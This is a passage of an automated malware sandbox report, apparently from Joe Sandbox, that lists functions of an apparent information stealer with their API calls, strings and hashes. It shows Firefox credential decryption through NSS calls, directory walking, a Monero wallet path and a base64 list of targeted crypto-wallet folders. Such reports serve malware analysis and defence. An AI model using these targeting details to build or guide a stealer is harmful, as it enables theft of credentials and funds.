Strings

%s\%s, xrefs: 00353A6F
%s%s, xrefs: 00353AAD
%s\%s\%s, xrefs: 00353A4A
%s\*, xrefs: 003538C0
%s\%s, xrefs: 0035397A

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: 04d42d0637087f7cfecbeb028442a96343848fb09824d94cf55f51f04b5cf108
Instruction ID: f43075923ab2b77ac0b2d09da63d2e5abf835a8cd914e7b49dec2c3905464327
Opcode Fuzzy Hash: 04d42d0637087f7cfecbeb028442a96343848fb09824d94cf55f51f04b5cf108
Instruction Fuzzy Hash: 89A152B1A002089BDB25DF64DC85FEE7378FB58301F044589F90DAA155EB75AB88CF62

Function 00354570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00354580
RtlAllocateHeap.NTDLL(00000000), ref: 00354587
wsprintfA.USER32 ref: 003545A6
FindFirstFileA.KERNEL32(?,?), ref: 003545BD
StrCmpCA.SHLWAPI(?,00360FC4), ref: 003545EB
StrCmpCA.SHLWAPI(?,00360FC8), ref: 00354601
FindNextFileA.KERNEL32(000000FF,?), ref: 0035468B
FindClose.KERNEL32(000000FF), ref: 003546A0
lstrcat.KERNEL32(?,0127E7C8), ref: 003546C5
lstrcat.KERNEL32(?,0127D9B0), ref: 003546D8
lstrlen.KERNEL32(?), ref: 003546E5
lstrlen.KERNEL32(?), ref: 003546F6

Strings

%s\*, xrefs: 0035459A
%s\%s, xrefs: 0035461B

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 671575355-2848263008
Opcode ID: 77148a1888e4cfb198cf72b1d07a45cb8b78dc0aba5ac822920dfba0a44955c8
Instruction ID: e1a554fd4c31482bd5947c2493ddb80aed904ee11e0eeaaf895a44030a077252
Opcode Fuzzy Hash: 77148a1888e4cfb198cf72b1d07a45cb8b78dc0aba5ac822920dfba0a44955c8
Instruction Fuzzy Hash: EC5168B19002189BD725EB70DC89FEE737CAB58301F404589FA09A6154EB749B8DDFA2

Function 0034ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0034ED3E
FindFirstFileA.KERNEL32(?,?), ref: 0034ED55
StrCmpCA.SHLWAPI(?,00361538), ref: 0034EDAB
StrCmpCA.SHLWAPI(?,0036153C), ref: 0034EDC1
FindNextFileA.KERNEL32(000000FF,?), ref: 0034F2AE
FindClose.KERNEL32(000000FF), ref: 0034F2C3

Strings

%s\*.*, xrefs: 0034ED32

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: 9166d33454d926aeb6ede56ee6497f987d33f147a72d3938165973a388be9252
Instruction ID: c38bd533848aaf78d6c1c1619416671e679d459c4c1cb11ef6e75b3d3a1d8bdc
Opcode Fuzzy Hash: 9166d33454d926aeb6ede56ee6497f987d33f147a72d3938165973a388be9252
Instruction Fuzzy Hash: 6EE146719116185ADB56FB60CC52EEE777CBF54301F404299B80A6A062EF306F8EEF51

Function 0034DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01279050,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00360C2E), ref: 0034DE5E
StrCmpCA.SHLWAPI(?,003614C8), ref: 0034DEAE
StrCmpCA.SHLWAPI(?,003614CC), ref: 0034DEC4
FindNextFileA.KERNEL32(000000FF,?), ref: 0034E3E0
FindClose.KERNEL32(000000FF), ref: 0034E3F2

Strings

\*.*, xrefs: 0034DE26

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: \*.*
API String ID: 2325840235-1173974218
Opcode ID: fa76cf9b7a6eee60e2e3f2f258caec50787f73a03a55e0cd3f4691c2650c9db1
Instruction ID: 8ba360ce4d8803fa2e5a34e38c850d2a1c9a275f866dc20690eb78bd4eb23025
Opcode Fuzzy Hash: fa76cf9b7a6eee60e2e3f2f258caec50787f73a03a55e0cd3f4691c2650c9db1
Instruction Fuzzy Hash: 67F19F718145189ADB17FB60CC95EEE7778BF14301F8042D9A80A6A0A1EF306F8EEF51

Function 0034C820 Relevance: 13.6, APIs: 9, Instructions: 95stringencryptionCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0034C871
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0034C87C
PK11_GetInternalKeySlot.NSS3 ref: 0034C88A
PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0034C8A5
PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0034C8EB
lstrcat.KERNEL32(?,00360B46), ref: 0034C943
lstrcat.KERNEL32(?,00360B47), ref: 0034C957
PK11_FreeSlot.NSS3(?), ref: 0034C961
lstrcat.KERNEL32(?,00360B4E), ref: 0034C978

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlen
String ID:
API String ID: 3356303513-0
Opcode ID: c12fb9e60bc67982baf020c27f071b13cf81efe96722a941c3a9a04e41ffd6f3
Instruction ID: f0e41e7eed53afa36956fded784817d9190ee5f226a6ec881647ce9157ab2f0c
Opcode Fuzzy Hash: c12fb9e60bc67982baf020c27f071b13cf81efe96722a941c3a9a04e41ffd6f3
Instruction Fuzzy Hash: 06416DB5D1421AEBDB10CF90DC89BEEB7B8AB48304F1041A9E509B7284D7746A84DFA1

Function 0070A552 Relevance: 11.5, Strings: 8, Instructions: 1508COMMON

Download Yara Rule

Strings

o/, xrefs: 0070B366
i[{, xrefs: 0070A5B9
Uj}o, xrefs: 0070A67E
?No;, xrefs: 0070A781
HG_, xrefs: 0070A909
wWm, xrefs: 0070AA86
%$_, xrefs: 0070B2AD
P>mN, xrefs: 0070A633

Memory Dump Source

Source File: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID:
String ID: o/$%$_$?No;$HG_$P>mN$Uj}o$i[{$wWm
API String ID: 0-4151864805
Opcode ID: 2dc5510a407c97612de966e28231df564774f73dcfd19ce9ec392b5ec738fab2
Instruction ID: 0b3070d122601f184be32840811ef1649da911485e83bd475321b195fa5715b6
Opcode Fuzzy Hash: 2dc5510a407c97612de966e28231df564774f73dcfd19ce9ec392b5ec738fab2
Instruction Fuzzy Hash: A5A2E2F3A0C204AFE7046E29EC8567ABBE9EF94720F1A493DE6C4C7744E63558048797

Function 00703AF7 Relevance: 10.4, Strings: 7, Instructions: 1622COMMON

Download Yara Rule

Strings

G~~, xrefs: 00704A72
U@?Z, xrefs: 0070461C
`1;~, xrefs: 00703D50
qn, xrefs: 00703FF3
eG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8XE11bHRpRG9nZVx8bXVsdGlkb2dlLndhbGxldHwwfEpheHggRGVza3RvcCAob2xkKXwxfFxqYXh4XExvY2FsIFN0b3JhZ2VcfGZpbGVfXzAu, xrefs: 007045C4
Ayu?, xrefs: 00703E30
s9u, xrefs: 00704D60

Memory Dump Source

Source File: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID:
String ID: Ayu?$G~~$U@?Z$`1;~$eG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8XE11bHRpRG9nZVx8bXVsdGlkb2dlLndhbGxldHwwfEpheHggRGVza3RvcCAob2xkKXwxfFxqYXh4XExvY2FsIFN0b3JhZ2VcfGZpbGVfXzAu$s9u$qn
API String ID: 0-2293519180
Opcode ID: f1f8e196ecff7b4bc7238312cf5781328e29ffa33d8532363a3c6433b8c74629
Instruction ID: cad6a52f10480a3e83449d3c7d30f222316fa9101dedc29d0272e1f09c2c17cd
Opcode Fuzzy Hash: f1f8e196ecff7b4bc7238312cf5781328e29ffa33d8532363a3c6433b8c74629
Instruction Fuzzy Hash: 3FB205F360C2049BE3046E2DEC8567AFBEAEBD4720F16893DE6C587744EA3558058693

Function 0070F49F Relevance: 9.1, Strings: 6, Instructions: 1631COMMON

Download Yara Rule

Strings

@e, xrefs: 0070F76B
gI5;, xrefs: 00710247
f{7g, xrefs: 0070FF4B
PX}o, xrefs: 0070F97A
MN, xrefs: 0070F611
<>^, xrefs: 00710385

Memory Dump Source

Source File: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
